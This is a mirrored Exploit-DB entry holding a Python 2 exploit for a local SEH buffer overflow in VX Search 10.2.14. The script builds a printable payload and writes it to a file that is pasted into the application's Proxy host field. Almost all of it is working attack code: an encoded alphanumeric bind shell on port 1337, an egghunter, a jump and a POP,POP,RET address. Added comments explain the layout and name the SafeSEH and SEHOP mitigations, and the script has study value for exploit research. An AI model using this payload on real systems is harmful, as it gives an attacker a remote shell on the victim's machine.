VX Search 10.2.14 – ‘Proxy’ Local Buffer Overflow (SEH)

  • 作者: wetw0rk
    日期: 2017-11-16
  • 类别:
    平台:
  • 来源: https://www.exploit-db.com/exploits/43156/
  • #!/usr/bin/env python
    #
    # Exploit Title : VXSearch v10.2.14 Local SEH Overflow
    # Date: 11/16/2017
    # Exploit Author: wetw0rk
    # Vendor Homepage : http://www.flexense.com/
    # Software link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe
    # Version : 10.2.14
    # Tested on : Windows 7 (x86)
    # Description : VX Search v10.2.14 suffers from a local buffer overflow. The
    # following exploit will generate a bind shell on port 1337. I
    # was unable to get a shell working with msfvenom shellcode so
    # below is a custom alphanumeric bind shell. Greetz rezkon ;)
    #
    # trigger the vulnerability by :
    # Tools -> Advanced options -> Proxy -> *Paste In Proxy Host Name
    #
    
    import struct
    
    # Python 2 script (print statement, str == bytes). It builds a single
    # 40000-byte string and writes it to pasteme.txt; the header comment
    # describes pasting that file into the Proxy host-name field.
    #
    # Payload layout, in order of concatenation (see `payload` below):
    #   offset      filler up to the SEH record (the "23920" constant)
    #   shellcode   egg tag + stage, followed by 4000 filler bytes
    #   nSEH        4-byte short jump that lands past the SEH record
    #   SEH         address of a POP,POP,RET sequence (little-endian)
    #   egghunter   small stage that runs after the handler returns
    #   trigger     filler so the total length is exactly 40000
    #
    # NOTE(review): the whole string is kept within printable ASCII — the
    # SEH comment says "[asciiprint]" and every encoded byte here is in the
    # 0x20..0x7e range — presumably because the target field only accepts
    # printable input; confirm against the application.
    #
    # Defender's view: an SEH overwrite of this shape only succeeds when the
    # module supplying the handler address lacks SafeSEH and the process is
    # not protected by SEHOP/DEP; those are the mitigations that break this
    # bug class (not verified on this page).

    # "w00tw00t" is presumably the egg marker the egghunter stage scans for
    # — TODO confirm; the hunter body below is opaque encoded code.
    shellcode = "w00tw00t"
    # Stack pivot written in printable bytes. The two AND masks share no set
    # bits, so eax becomes 0; the three SUBs then form a constant that
    # `push eax; pop esp` moves into ESP.
    shellcode += (
    "\x25\x4a\x4d\x4e\x55"# and eax, 0x554e4d4a
    "\x25\x35\x32\x31\x2a"# and eax, 0x2a313235
    "\x2d\x6a\x35\x35\x35"# sub eax, 0x3535356a
    "\x2d\x65\x6a\x6a\x65"# sub eax, 0x656a6a65
    "\x2d\x61\x64\x4d\x65"# sub eax, 0x654d6461
    "\x50"# push eax
    "\x5c"# pop esp
    )
    # Encoded stage: repeated AND/AND/SUB/SUB/SUB/PUSH groups (0x25, 0x2d,
    # 0x50) that the header comment describes as a custom alphanumeric
    # bind shell on port 1337. Contents are not decoded here.
    shellcode += (
    "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x4f\x4f\x4f\x4f"
    "\x2d\x4f\x30\x4f\x68\x2d\x62\x2d\x62\x72\x50\x25\x4a\x4d\x4e"
    "\x55\x25\x35\x32\x31\x2a\x2d\x76\x57\x57\x63\x2d\x77\x36\x39"
    "\x32\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41\x54"
    "\x54\x54\x2d\x25\x54\x7a\x2d\x2d\x25\x52\x76\x36\x50\x25\x4a"
    "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x49\x35\x49\x49\x2d\x49"
    "\x25\x49\x69\x2d\x64\x25\x72\x6c\x50\x25\x4a\x4d\x4e\x55\x25"
    "\x35\x32\x31\x2a\x2d\x70\x33\x33\x25\x2d\x70\x25\x70\x25\x2d"
    "\x4b\x6a\x56\x39\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"
    "\x2d\x79\x55\x75\x32\x2d\x79\x75\x75\x55\x2d\x79\x77\x77\x78"
    "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x25\x4a\x4a"
    "\x25\x2d\x39\x5f\x4d\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32"
    "\x31\x2a\x2d\x4b\x57\x4b\x57\x2d\x70\x76\x4b\x79\x2d\x70\x76"
    "\x78\x79\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x49"
    "\x49\x49\x49\x2d\x49\x4e\x64\x49\x2d\x78\x25\x78\x25\x2d\x6f"
    "\x25\x7a\x48\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d"
    "\x58\x58\x38\x58\x2d\x58\x30\x32\x58\x2d\x51\x46\x2d\x47\x50"
    "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x5f\x52\x5f\x5f"
    "\x2d\x5f\x25\x25\x35\x2d\x62\x39\x25\x25\x50\x25\x4a\x4d\x4e"
    "\x55\x25\x35\x32\x31\x2a\x2d\x4a\x4a\x4a\x4a\x2d\x4a\x4a\x4a"
    "\x4a\x2d\x79\x39\x4a\x79\x2d\x6d\x32\x4b\x68\x50\x25\x4a\x4d"
    "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x30\x30\x71\x30\x2d\x30\x25"
    "\x71\x30\x2d\x38\x31\x51\x5f\x50\x25\x4a\x4d\x4e\x55\x25\x35"
    "\x32\x31\x2a\x2d\x32\x32\x32\x32\x2d\x78\x77\x7a\x77\x50\x25"
    "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x62\x62\x62\x62\x2d"
    "\x48\x57\x47\x4f\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"
    "\x2d\x76\x76\x4f\x4f\x2d\x36\x39\x5a\x5a\x50\x25\x4a\x4d\x4e"
    "\x55\x25\x35\x32\x31\x2a\x2d\x61\x61\x61\x61\x2d\x4a\x61\x4a"
    "\x25\x2d\x45\x77\x53\x35\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32"
    "\x31\x2a\x2d\x63\x63\x63\x63\x2d\x39\x63\x63\x2d\x2d\x32\x63"
    "\x7a\x25\x2d\x31\x49\x7a\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35"
    "\x32\x31\x2a\x2d\x72\x79\x79\x79\x2d\x25\x30\x25\x30\x2d\x25"
    "\x32\x25\x55\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d"
    "\x58\x58\x41\x58\x2d\x58\x58\x25\x77\x2d\x6e\x51\x32\x69\x50"
    "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x48\x77\x38\x48"
    "\x2d\x4e\x76\x6e\x61\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31"
    "\x2a\x2d\x41\x41\x6e\x6e\x2d\x31\x31\x30\x6e\x2d\x37\x36\x30"
    "\x2d\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x38\x38"
    "\x38\x38\x2d\x38\x79\x38\x25\x2d\x38\x79\x38\x25\x2d\x58\x4c"
    "\x73\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x61"
    "\x52\x61\x52\x2d\x37\x4a\x31\x49\x50\x25\x4a\x4d\x4e\x55\x25"
    "\x35\x32\x31\x2a\x2d\x4d\x47\x4d\x4d\x2d\x30\x25\x4d\x6b\x2d"
    "\x36\x32\x66\x71\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"
    "\x2d\x36\x43\x43\x6c\x2d\x33\x54\x47\x25\x50\x25\x4a\x4d\x4e"
    "\x55\x25\x35\x32\x31\x2a\x2d\x4c\x4c\x4c\x4c\x2d\x6e\x4c\x6e"
    "\x36\x2d\x65\x67\x6f\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32"
    "\x31\x2a\x2d\x25\x25\x4b\x4b\x2d\x25\x25\x6f\x4b\x2d\x4e\x41"
    "\x59\x2d\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41"
    "\x41\x41\x41\x2d\x52\x52\x78\x41\x2d\x6e\x6c\x70\x25\x50\x25"
    "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x30\x6c\x30\x30\x2d"
    "\x30\x6c\x6c\x30\x2d\x38\x70\x79\x66\x50\x25\x4a\x4d\x4e\x55"
    "\x25\x35\x32\x31\x2a\x2d\x42\x70\x70\x45\x2d\x32\x45\x70\x31"
    "\x2d\x25\x4b\x49\x31\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31"
    "\x2a\x2d\x25\x50\x50\x50\x2d\x25\x7a\x72\x25\x2d\x4e\x73\x61"
    "\x52\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x35\x77"
    "\x74\x74\x2d\x61\x78\x35\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35"
    "\x32\x31\x2a\x2d\x30\x30\x30\x30\x2d\x30\x30\x59\x30\x2d\x30"
    "\x30\x74\x51\x2d\x6b\x36\x79\x67\x50\x25\x4a\x4d\x4e\x55\x25"
    "\x35\x32\x31\x2a\x2d\x75\x38\x43\x43\x2d\x7a\x31\x43\x43\x2d"
    "\x7a\x2d\x77\x79\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"
    "\x2d\x59\x59\x59\x59\x2d\x59\x59\x59\x59\x2d\x6f\x6c\x4d\x77"
    "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x45\x45\x45"
    "\x45\x2d\x34\x2d\x76\x45\x2d\x37\x25\x5a\x65\x50\x25\x4a\x4d"
    "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x34\x34\x34\x34\x2d\x62\x34"
    "\x34\x34\x2d\x6d\x56\x47\x57\x50\x25\x4a\x4d\x4e\x55\x25\x35"
    "\x32\x31\x2a\x2d\x2d\x2d\x2d\x2d\x2d\x76\x2d\x2d\x76\x2d\x55"
    "\x4c\x55\x7a\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d"
    "\x77\x77\x77\x30\x2d\x47\x47\x79\x30\x2d\x42\x42\x39\x34\x50"
    "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x56\x75\x36\x51"
    "\x2d\x42\x61\x49\x43\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31"
    "\x2a\x2d\x56\x56\x31\x56\x2d\x31\x79\x31\x25\x2d\x50\x6c\x48"
    "\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x72\x72"
    "\x72\x72\x2d\x72\x25\x38\x38\x2d\x38\x25\x25\x25\x2d\x54\x41"
    "\x30\x30\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x47"
    "\x47\x47\x76\x2d\x47\x47\x76\x76\x2d\x6b\x72\x6c\x5a\x50\x25"
    "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x25\x71\x25\x71\x2d"
    "\x73\x42\x63\x68\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"
    "\x2d\x48\x55\x51\x51\x2d\x45\x78\x4f\x5a\x50\x25\x4a\x4d\x4e"
    "\x55\x25\x35\x32\x31\x2a\x2d\x45\x45\x45\x32\x2d\x45\x45\x25"
    "\x31\x2d\x76\x75\x2d\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32"
    "\x31\x2a\x2d\x6e\x4f\x6d\x6e\x2d\x35\x48\x5f\x5f\x50\x25\x4a"
    "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x2d\x2d\x2d\x2d\x2d\x71"
    "\x2d\x2d\x71\x2d\x71\x2d\x4a\x71\x2d\x66\x65\x70\x62\x50\x25"
    "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x56\x30\x56\x30\x2d"
    "\x56\x38\x25\x30\x2d\x74\x37\x25\x45\x50\x25\x4a\x4d\x4e\x55"
    "\x25\x35\x32\x31\x2a\x2d\x32\x32\x32\x77\x2d\x32\x32\x32\x32"
    "\x2d\x43\x41\x4a\x57\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31"
    "\x2a\x2d\x63\x63\x63\x30\x2d\x79\x41\x41\x6e\x50\x25\x4a\x4d"
    "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x4b\x4b\x4b\x4b\x2d\x4b\x4b"
    "\x25\x31\x2d\x4b\x71\x25\x32\x2d\x4f\x6e\x25\x2d\x50\x25\x4a"
    "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x37\x37\x37\x37\x2d\x6d"
    "\x37\x6d\x37\x2d\x6d\x37\x6d\x37\x2d\x64\x55\x63\x58\x50\x25"
    "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x44\x6c\x6c\x6c\x2d"
    "\x34\x44\x44\x6c\x2d\x30\x33\x4e\x54\x50\x25\x4a\x4d\x4e\x55"
    "\x25\x35\x32\x31\x2a\x2d\x2d\x7a\x43\x2d\x2d\x48\x79\x71\x47"
    "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41\x41\x41"
    "\x41\x2d\x41\x46\x71\x25\x2d\x5a\x77\x7a\x32\x50\x25\x4a\x4d"
    "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x47\x47\x47\x47\x2d\x47\x6e"
    "\x47\x6e\x2d\x47\x78\x6e\x78\x2d\x47\x79\x77\x79\x50\x25\x4a"
    "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x74\x38\x69\x38\x2d\x51"
    "\x4a\x72\x52\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d"
    "\x79\x79\x30\x79\x2d\x4d\x4d\x2d\x4d\x2d\x44\x35\x25\x41\x50"
    "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x6f\x6f\x6f\x31"
    "\x2d\x74\x25\x6f\x33\x2d\x56\x32\x41\x25\x50\x25\x4a\x4d\x4e"
    "\x55\x25\x35\x32\x31\x2a\x2d\x54\x54\x54\x54\x2d\x72\x72\x54"
    "\x54\x2d\x79\x69\x49\x56\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32"
    "\x31\x2a\x2d\x70\x70\x70\x70\x2d\x70\x25\x5a\x70\x2d\x4a\x38"
    "\x36\x72\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x6d"
    "\x6d\x6d\x6d\x2d\x6d\x6d\x6d\x46\x2d\x48\x76\x74\x25\x2d\x53"
    "\x7a\x25\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d"
    "\x7a\x7a\x7a\x43\x2d\x49\x43\x25\x43\x2d\x25\x5f\x25\x30\x50"
    "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x51\x51\x51\x51"
    "\x2d\x51\x51\x51\x70\x2d\x38\x51\x61\x7a\x2d\x25\x39\x70\x7a"
    "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x37\x44\x37"
    "\x6c\x2d\x78\x30\x6f\x73\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32"
    "\x31\x2a\x2d\x44\x25\x25\x44\x2d\x76\x25\x76\x76\x2d\x63\x6c"
    "\x63\x74\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x42"
    "\x47\x74\x4e\x2d\x33\x6c\x7a\x39\x50\x25\x4a\x4d\x4e\x55\x25"
    "\x35\x32\x31\x2a\x2d\x7a\x30\x66\x7a\x2d\x76\x44\x4f\x49\x50"
    "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41\x41\x41\x41"
    "\x2d\x6d\x67\x33\x6c\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31"
    "\x2a\x2d\x51\x51\x51\x51\x2d\x65\x71\x51\x51\x2d\x49\x76\x7a"
    "\x6a\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x35\x4a"
    "\x42\x35\x2d\x35\x7a\x7a\x42\x2d\x76\x7a\x73\x7a\x50\x25\x4a"
    "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x35\x25\x35\x35\x2d\x35"
    "\x25\x76\x35\x2d\x35\x39\x52\x69\x50\x25\x4a\x4d\x4e\x55\x25"
    "\x35\x32\x31\x2a\x2d\x74\x74\x74\x5a\x2d\x36\x5a\x74\x30\x2d"
    "\x25\x32\x6a\x38\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"
    "\x2d\x75\x75\x43\x75\x2d\x43\x6f\x41\x30\x2d\x39\x64\x30\x34"
    "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x74\x2d\x58"
    "\x6e\x2d\x78\x47\x35\x69\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32"
    "\x31\x2a\x2d\x66\x79\x4f\x66\x2d\x48\x7a\x25\x47\x50\x25\x4a"
    "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x42\x42\x7a\x42\x2d\x33"
    "\x6d\x55\x32\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d"
    "\x61\x61\x61\x41\x2d\x61\x39\x64\x25\x2d\x59\x33\x7a\x34\x50"
    "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x66\x66\x66\x66"
    "\x2d\x41\x41\x66\x66\x2d\x25\x33\x66\x66\x2d\x34\x25\x6d\x43"
    "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x49\x49\x32"
    "\x49\x2d\x49\x59\x25\x49\x2d\x72\x74\x25\x6d\x50"
    )
    # Trailing filler; together with `offset` below this places the SEH
    # record at a fixed position (purpose of the 4000 bytes not stated).
    shellcode += "A" * 4000

    # 40 bytes of 'A' (inc ecx on x86) act as a sled so the jump from nSEH
    # may land anywhere in it — the original comment calls them "NOP's".
    egghunter = "A" * 40# serve as NOP's
    # Same zero-eax / SUB / push-pop pivot pattern as the stage above,
    # with different SUB constants.
    egghunter += (
    "\x25\x4a\x4d\x4e\x55"# and eax, 0x554e4d4a
    "\x25\x35\x32\x31\x2a"# and eax, 0x2a313235
    "\x2d\x58\x58\x58\x58"# sub eax, 0x58585858
    "\x2d\x58\x58\x67\x58"# sub eax, 0x58675858
    "\x2d\x5a\x4f\x2d\x4f"# sub eax, 0x4f2d4f5a
    "\x50"# push eax
    "\x5c"# pop esp
    )
    # Encoded hunter body, written as literal printable text ('%'=AND,
    # '-'=SUB, 'P'=PUSH). Not decoded here.
    egghunter += (
    "%JMNU%521*-%OOO-%OOO-AzayP%JMNU%521*-r-Pr-"
    "r%Pr-m7ukP%JMNU%521*-wwww-wwwA-wwA--k%FBP%"
    "JMNU%521*-Jk1J-Tk1T-sp%1P%JMNU%521*-WWM6-6"
    "W30-7L%%P%JMNU%521*-WNWW-W%d%-P4wTP%JMNU%5"
    "21*-wt7G-zIvNP%JMNU%521*-1%uu-1%u1-84KYP"
    )

    # offset + shellcode is always exactly 23920 bytes, so nSEH starts at
    # that fixed position regardless of the stage's length (as long as the
    # stage is shorter than 23920 bytes; a negative repeat count would
    # silently yield an empty string and shift the record).
    offset= "A" * (23920-len(shellcode))# offset to nSEH
    # JE +0x26 / JNE +0x26: the pair covers both flag states, so it behaves
    # as an unconditional short jump forward past the 4-byte SEH record
    # into the egghunter sled, using only printable bytes ('t&u&').
    nSEH= "\x74\x26\x75\x26"# JE/JNZ + 38 (decimal) 
    # Handler address packed little-endian; the bytes ('g0&e') are all
    # printable. Per the comment the target module is QtGui4.dll.
    SEH = struct.pack('<L', 0x65263067) # POP,POP,RET (QtGui4.dll [asciiprint])
    # Pad so the final payload is exactly 40000 bytes long.
    trigger = "A" * (40000 - (
    len(offset) +
    len(nSEH) +
    len(SEH)+
    len(egghunter)+
    len(shellcode)
    )
    )

    payload = offset + shellcode + nSEH + SEH + egghunter + trigger
    print "[*] payload written to pasteme.txt"
    # Text-mode write; the payload contains no 0x0a bytes, so Windows
    # newline translation does not alter it. Not closed via `with`.
    fd = open("pasteme.txt", 'w')
    fd.write(payload)
    fd.close()